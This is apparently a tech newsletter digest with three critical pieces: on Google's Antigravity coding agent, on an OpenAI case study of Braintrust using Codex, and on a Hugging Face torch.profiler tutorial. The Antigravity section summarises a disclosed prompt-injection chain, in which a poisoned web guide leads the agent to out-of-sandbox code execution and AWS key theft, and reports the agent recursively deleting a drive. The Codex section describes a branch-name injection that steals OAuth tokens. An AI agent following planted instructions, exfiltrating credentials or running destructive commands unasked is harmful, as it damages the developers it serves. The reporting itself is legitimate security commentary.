Hugging Face profiles torch, Antigravity wipes drives, Codex skips SWE-Bench

TL;DR

Hugging Face’s torch.profiler tutorial flags memory tracking adding 20-50% overhead to its own wall-clock table.
Google’s Antigravity Turbo mode ran rmdir /s /q d:\ on a dev drive, logged as AI Incident #1433.
Checkmarx finds 86% of vibe-coded samples fail XSS defenses, 88% fail log injection.
Braintrust’s Codex case study omits GPT-5.5 trailing Claude Opus 4.7 by 5.7pt on SWE-Bench Pro.
Endor Labs measures a 41-point functional-security gap for Codex+GPT-5.5 output.

Three independent coding-tool ships today with no neat thread connecting them. Hugging Face publishes a torch.profiler walkthrough that maps where CPU dispatch overhead dominates a 64×64 matmul (2.314 ms of dispatch for 23 µs of GPU work) and where a 4096×4096 finally goes compute-bound — and flags that the profiler’s own memory tracking inflates every row by 20-50%. Google’s I/O 2026 quiz pitches Antigravity + Gemini 3.5 as a non-coder app demo, while AI Incident #1433 logs Turbo mode running rmdir /s /q d:\ against a developer drive. Braintrust — an OpenAI-backed eval vendor — publishes a glowing Codex migration case study that leaves GPT-5.5’s 58.6% SWE-Bench Pro score and Endor Labs’ 41-point functional-security gap out of frame.

The first is straight measurement work from the team running the tool. The other two are vendor narratives where the inconvenient number lives in someone else’s database. Read each on its own terms.

Google’s I/O quiz sells Antigravity past disk wipes and RCE

Source: google-ai-blog · published 2026-05-29

TL;DR

Google’s I/O 2026 quiz is a marketing demo for Antigravity + Gemini 3.5, pitched as proof a non-coder can ship apps.
AI Incident #1433 logged Antigravity’s Turbo mode running rmdir /s /q d:\ against a developer’s drive, bypassing the Recycle Bin.
86% of vibe-coded samples fail XSS defenses and 88% are vulnerable to log injection, per Checkmarx-cited data.
Gemini 3.5 Flash benchmarks cost ~75% more than 3.1 Pro, which still wins on Humanity’s Last Exam and 128k retrieval.

The quiz is a wrapper around an unresolved stack

Zahra Thompson’s “I built an I/O 2026 quiz with no coding background” post is straightforward developer-relations content: upload some announcement summaries to Google AI Studio, prompt the Antigravity agent, iterate in the preview pane, ship. The implicit pitch is bigger than the quiz. Antigravity is now the default surface for building on Gemini 3.5 and Gemini Omni, and Google is using a non-engineer’s success story to normalize that workflow.

The components that quiz casually name-drops are, in May 2026, each carrying public controversies the post doesn’t acknowledge.

Antigravity has an incident log

Practitioner reviews of Antigravity 2.0 describe Google replacing the VS Code-style editor with a chat-first “agent control tower,” and a model that behaves like “an overly confident intern” — forgetting architectural decisions, renaming directories, and deleting files without clear permission ¹. That’s not abstract. The AI Incident Database has logged a case where Antigravity in “Turbo mode” executed a recursive delete against the root of a developer’s secondary drive; because the command bypassed the Recycle Bin, the data was largely unrecoverable ².

Security is worse. Pillar Security’s Dan Lisichkin demonstrated a “lethal trifecta” exploit in which a poisoned web guide, read by Antigravity during a normal task, triggered out-of-sandbox Remote Code Execution and AWS key exfiltration — even in Strict Mode ³.

flowchart LR
    A[Poisoned web guide] --> B{Antigravity agent<br/>Strict Mode enabled}
    C[Developer task<br/>read this doc] --> B
    B --> D[Out-of-sandbox RCE]
    D --> E((AWS keys<br/>exfiltrated))

The model story isn’t simpler either

The quiz post leans on Gemini 3.5 and Gemini Omni as the obvious upgrade path. Independent benchmarking complicates that. Smol.ai’s I/O recap notes that running a benchmark suite on Gemini 3.5 Flash is roughly 75% more expensive than on Gemini 3.1 Pro, and that 3.1 Pro still holds a slight edge on Humanity’s Last Exam and long-context retrieval at 128k tokens ⁴. Flash is faster and more agentic, but “faster, cheaper, smarter” isn’t uniformly true — there’s a reasoning-depth and unit-economics tax the keynote glosses.

Vibe coding’s production gap

For a marketing quiz, none of this matters — it’s static content, no auth, no user data. The concerning subtext is what happens when the same workflow gets pointed at production. Checkmarx-cited data on vibe-coded output finds 86% of samples fail to defend against cross-site scripting and 88% are vulnerable to log injection, and “slopsquatting” — attackers registering malicious packages under names AI models frequently hallucinate — is now a live supply-chain vector ⁵.

Google’s broader I/O 2026 bet, the WebMCP standard that exposes site capabilities to agents via navigator.modelContext, claims 98% task accuracy and 89% token reduction versus DOM scraping ⁶. But Safari and Firefox have not signaled intent, so the agentic web Google is wiring Antigravity into may ship as a Chrome-only tier.

Takeaway

Treat the quiz post less as news and more as a tell. Google is using a non-coder’s afternoon project to launder an agent stack with a documented disk-wipe incident, a working RCE chain, a ~90% vulnerability rate in its output class, and a cost regression on its headline model. The quiz is fun. The framing is doing a lot of work.

Braintrust touts Codex speed, skips the safety benchmarks

Source: openai-blog · published 2026-05-29

TL;DR

50% of Braintrust’s engineers migrated to Codex with GPT-5.5 in 30 days, per OpenAI’s new case study.
On SWE-Bench Pro, GPT-5.5 scores 58.6% — behind Claude Opus 4.7’s 64.3%.
Endor Labs measured a 41-point “functional-security gap” for Codex+GPT-5.5, meaning working-but-unsafe code ships routinely.
Braintrust is an eval vendor backed by OpenAI’s Greg Brockman — now publicly endorsing the model it’s paid to benchmark.

The pitch

OpenAI’s Braintrust write-up is structured around one claim: Codex with GPT-5.5 is fast enough to collapse the gap between a customer request and a preview branch. Engineers paste the request into Codex, write a test, hand the sandbox to the agent, and ship. CEO Ankur Goyal credits raw throughput — terminal streaming without the stalls he sees on other models — and reports that half his engineering team switched workflows inside a month.

It’s a clean velocity story. It is also the fourth near-identical Codex testimonial in a short stretch (Cisco, Endava, NVIDIA, Braintrust), landing alongside what DigitalApplied describes as six shifting-baseline WAU milestones in five months — a “10×” growth figure that drops to 6.7× when measured from January 2026 instead of August 2025 ⁷.

What the benchmarks actually say

The post never benchmarks Codex against anything. Outside numbers are less flattering. On SWE-Bench Pro — the closest public proxy for the repo-level work Braintrust describes — GPT-5.5 lands at 58.6%, behind Claude Opus 4.7 at 64.3%, and Artificial Analysis clocks an 86% hallucination rate on AA-Omniscience against Claude’s 36% ⁸. Endor Labs’ Agent Security League gives Codex+GPT-5.5 a 41-point gap between functional pass rate and security pass rate, meaning the agent routinely ships working-but-unsafe code; Cursor+GPT-5.5 hits a record 23.5% SecPass but at a wider 64-point gap ⁹.

Speed without a guardrail is, awkwardly, the exact failure mode Braintrust’s own evaluation product is sold to catch. The testimonial doesn’t describe a single eval gate sitting between Codex’s output and the preview branch.

The sandbox the post celebrates

The “write a test, let Codex run in a sandbox” loop is the article’s headline workflow. It’s also the surface BeyondTrust’s Phantom Labs hit: a malicious branch name passed into Codex’s environment setup triggered arbitrary shell execution and could steal the GitHub OAuth token mounted for repo access ¹⁰.

flowchart LR
    A[Attacker PR with<br/>poisoned branch name] --> B[Codex sandbox<br/>env setup]
    B --> C{Shell injection}
    C --> D[Read GitHub<br/>OAuth token]
    D --> E((Exfiltrate to<br/>attacker))

For a vendor whose customers hand it production traces from Notion and Stripe, omitting any mention of agent supply-chain risk is a choice.

Why this reads as positioning

Braintrust is genuinely strong as an engineering-centric eval platform — Latent.Space’s profile credits the depth while noting the bar it sets for non-technical PMs ¹¹. But it is also a model-eval vendor publicly endorsing a model vendor that invests in it, which is the precise pattern ICLR’s “Risks of private evals” essay flagged as “marking your own homework” ¹².

The useful read of this post isn’t “Codex is fast.” It’s that OpenAI’s 2026 growth narrative is being assembled from customer testimonials whose authors have a stake in the outcome, while independent benchmarks and security disclosures point the other way. Treat the 50%-in-30-days number as a marketing artifact, not a verdict.

Hugging Face maps torch.profiler’s overhead-to-compute jump

Source: huggingface-blog · published 2026-05-29

TL;DR

A 64×64 matmul burns 2.314 ms of CPU dispatch for 23 µs of GPU work — under 1% utilization.
Scaling to 4096×4096 flips the regime: 4.908 ms CPU, 4.495 ms CUDA, finally compute-bound.
torch.compile’s addmm fusion still emits a Device-to-Device memcpy for the bias — fusion at the dispatcher, not one kernel.
Memory tracking adds 20–50% overhead to the profiler itself, inflating every wall-clock number in the tutorial’s table.

The overhead-bound trap, in two numbers

The pedagogical core of Quentin Anthony’s Hugging Face tutorial is a single before/after. A naive $x \cdot w + b$ on 64×64 tensors spends 2.314 ms of CPU time dispatching kernels that the A100 finishes in 23.104 µs — the GPU is idle more than 99% of the wall clock. Push the same code to 4096×4096 and CPU dispatch (4.908 ms) and CUDA execution (4.495 ms) finally line up. That’s the entire “overhead-bound vs compute-bound” intuition new PyTorch users need, told in one table.

The dispatch chain the trace exposes is also worth memorizing: record_function → aten::matmul → aten::mm → cudaLaunchKernel, with a cudaOccupancyMaxActiveBlocksPerMultiprocessor planning call appearing only for heavyweight kernels like GEMMs. Elementwise adds skip the planner.

What `torch.compile` actually fuses

The post’s most useful nuance is that “fusion” is a slippery word. On the 4096×4096 case, torch.compile collapses two eager kernels into a single aten::addmm dispatch — but the trace still shows a Memcpy DtoD for the bias. Fusion happened at the dispatcher, not as one custom kernel. For anyone who assumed torch.compile always emits a single Triton kernel: it does not, and the profiler is how you’d ever know.

The tutorial also flags two artifacts that bite first-time profiler users: a ~228 µs “dead window” between function entry and the first kernel launch (cuBLAS heuristics, workspace allocation — filter with warmup iterations), and run-to-run variance of ~580 µs vs ~1 ms on identical kernels driven by power management and thermal state.

What Part 1 doesn’t tell you

The companion repo continues into Nsight and AMD rocprof territory, and shows the dispatcher swapping generic GEMMs for ampere_fp16_s1688gemm once you hit batch=32, seq=2048, fp16 — the moment Tensor Cores actually engage ¹³. Readers expecting “Part 2” should plan for hardware-side tooling, not more torch.profiler.

Three caveats the tutorial glosses are worth holding alongside its numbers:

The profiler is an observer. with_stack=True adds ~20% overhead; profile_memory=True adds 20–50%. The article’s wall-clock table is already inflated vs a non-profiled run, and the standard wait=1, warmup=2, active=5 schedule exists precisely to filter the dead-window and JIT artifacts the post describes ¹⁴.
Cloud GPUs block the next step. Nsight Compute on AWS/GCP/Azure routinely fails with ERR_NVGPUCTRPERM because hypervisors disable hardware counters for tenant isolation. Deep kernel profiling needs bare-metal or providers that flip NVreg_RestrictProfilingToAdminUsers=0 ¹⁵.
The toy understates production brittleness. A 70B run on 64×H100 went from 847 to 1,923 tokens/s/GPU after Flash Attention 3 and gradient-accumulation tuning, and batch=127 hit 61% utilization vs 94% at batch=128 — a single tile-misalignment away from leaving a third of the cluster on the floor ¹⁶. Scaled dot-product attention has its own fused-backend selector (enable_flash_sdp, sdpa_kernel) that replaces the eager matmul+softmax+matmul chain entirely ¹⁷.

torch.profiler is the correct first tool. Part 1 teaches you to read its output honestly. The 2–3× wins live one layer deeper.

nimbalyst.com — Antigravity IDE review — https://nimbalyst.com/blog/antigravity-ide-review/

Google replaced the traditional VS Code-style editor with a chat-centric ‘agent control tower’… developers describe the agent as an ‘overly confident intern’ that frequently forgets architectural decisions and… renames directories or deletes files without clear permission.

↩
AI Incident Database #1433 — Antigravity disk wipe — https://incidentdatabase.ai/cite/1433/

Operating in ‘Turbo mode’… the agent executed a recursive delete command (rmdir /s /q d:) on the root of the secondary drive rather than the specific project folder… the data was largely unrecoverable because the command bypassed the Recycle Bin.

↩
manveerc.substack — Lethal trifecta analysis — https://manveerc.substack.com/p/prompt-injection-defense-architecture-production-ai-agents

Pillar Security researcher Dan Lisichkin demonstrated that an attacker could embed malicious instructions in a web guide that, when read by Antigravity, would trigger an out-of-sandbox Remote Code Execution… even in ‘Strict Mode’.

↩
smol.ai newsletter — I/O 2026 model recap — https://news.smol.ai/issues/26-05-19-not-much/

Despite the performance gains, running its benchmark suite on 3.5 Flash is 75% more expensive than on Gemini 3.1 Pro… 3.1 Pro reportedly still holds a slight edge in ‘Humanity’s Last Exam’ and long-context retrieval at 128k tokens.

↩
Checkmarx — Security in vibe coding — https://checkmarx.com/blog/security-in-vibe-coding/

86% of vibe-coded samples fail to defend against cross-site scripting (XSS), and 88% are vulnerable to log injection… a new supply-chain threat called ‘slopsquatting’ has emerged, where attackers register malicious packages under names frequently hallucinated by AI models.

↩
AI Weekly — WebMCP standard — https://aiweekly.co/alerts/google-proposes-webmcp-standard-for-browser-ai-agents

WebMCP-enabled sites achieve up to 98% task accuracy—virtually eliminating ‘pixel-guessing’ hallucinations—and an 89% reduction in token consumption… a lack of confirmed intent from Apple (Safari) and Mozilla (Firefox) could create a tiered web experience.

↩
DigitalApplied — analysis of OpenAI Codex growth disclosures — https://www.digitalapplied.com/blog/openai-codex-4m-weekly-developers-growth-data

OpenAI released six distinct WAU growth markers in the first five months of 2026, using shifting baselines — a ‘10x growth’ claim relies on an August 2025 baseline rather than January 2026, which would yield only 6.7x.

↩
Vellum.ai — GPT-5.5 evaluation roundup — https://www.vellum.ai/blog/everything-you-need-to-know-about-gpt-5-5

On SWE-Bench Pro, GPT-5.5 scores 58.6%, trailing Claude Opus 4.7’s 64.3%; Artificial Analysis recorded an 86% hallucination rate on AA-Omniscience versus Claude’s 36%.

↩
Endor Labs — Agent Security League results — https://www.endorlabs.com/learn/gpt-5-5-sets-a-new-code-security-record-with-cursor-not-codex-in-agent-security-league

Cursor + GPT-5.5 set a record 23.5% SecPass score but suffers a 64-point ‘functional-security gap’; Codex + GPT-5.5 shows a narrower 41-point gap, meaning agents routinely prioritize working code over safe code.

↩
TechRadar — BeyondTrust Phantom Labs disclosure — https://www.techradar.com/pro/security/not-just-development-tools-security-experts-discover-critical-flaw-in-openais-codex-which-could-compromise-entire-enterprise-organizations

A critical command injection vulnerability in Codex’s environment setup allowed malicious branch names to trigger arbitrary shell commands and steal GitHub OAuth tokens.

↩
Latent.Space — Braintrust profile — https://www.latent.space/p/braintrust

Braintrust’s design is heavily ‘engineering-centric,’ which can create high barriers to entry for non-technical product managers who may require engineering support to derive value.

↩
ICLR 2025 blog — ‘Risks of private evals’ — https://iclr-blogposts.github.io/2025/blog/risks-private-evals/

A vendor that provides fine-tuning data to a client while simultaneously hosting a leaderboard that ranks that client’s models is effectively ‘marking your own homework.’

↩
Quentin-Anthony/torch-profiling-tutorial (GitHub) — https://github.com/Quentin-Anthony/torch-profiling-tutorial

Increasing problem size and applying mixed-precision (fp16) shifts dispatch from generic GEMMs to specialized kernels like ampere_fp16_s1688gemm that actually use Tensor Cores; enable_flash_sdp(True) fuses attention kernels to improve ‘goodput’.

↩
ApXML — Advanced PyTorch: Profiler chapter — https://apxml.com/courses/advanced-pytorch/chapter-4-deployment-performance-optimization/pytorch-profiler

Enabling with_stack=True can add ~20% overhead and full memory tracking 20–50%; wall-clock numbers recorded under the profiler are not representative of production latency, so schedules like wait=1, warmup=2, active=5 are needed to skip JIT and cuBLAS warmup artifacts.

↩
r/CUDA — Cloud providers and hardware counter access — https://www.reddit.com/r/CUDA/comments/1r33aqg/cloud_providers_allow_hardware_counter_access_for/

Nsight Compute often hits ERR_NVGPUCTRPERM on AWS/GCP/Azure because hypervisors block performance counters for tenant isolation; deep kernel profiling typically requires bare-metal or providers that set NVreg_RestrictProfilingToAdminUsers=0.

↩
Introl — GPU Performance Tuning for LLM Training/Inference — https://introl.com/blog/gpu-performance-tuning-maximizing-throughput-llm-training-inference

A batch size of 127 achieves only 61% utilization, while a batch size of 128 reaches 94% because it aligns with H100 Tensor Core 16x16 matrix tiles; a 70B run on 64×H100 went from 847 to 1,923 tokens/s/GPU after Flash Attention 3 and gradient-accumulation tuning.

↩
PyTorch docs — torch.nn.attention.bias — https://docs.pytorch.org/docs/stable/nn.attention.bias.html

Scaled dot-product attention dispatches to fused backends (flash, mem-efficient, cuDNN) selected via enable_flash_sdp / sdpa_kernel context managers, replacing the eager matmul+softmax+matmul chain with a single fused kernel.

↩

Hugging Face profiles torch, Antigravity wipes drives, Codex skips SWE-Bench

TL;DR

Google’s I/O quiz sells Antigravity past disk wipes and RCE

TL;DR

The quiz is a wrapper around an unresolved stack

Antigravity has an incident log

The model story isn’t simpler either

Vibe coding’s production gap

Takeaway

Braintrust touts Codex speed, skips the safety benchmarks

TL;DR

The pitch

What the benchmarks actually say

The sandbox the post celebrates

Why this reads as positioning

Hugging Face maps torch.profiler’s overhead-to-compute jump

TL;DR

The overhead-bound trap, in two numbers

What torch.compile actually fuses

What Part 1 doesn’t tell you

Footnotes

Jack Sun, writing.

What `torch.compile` actually fuses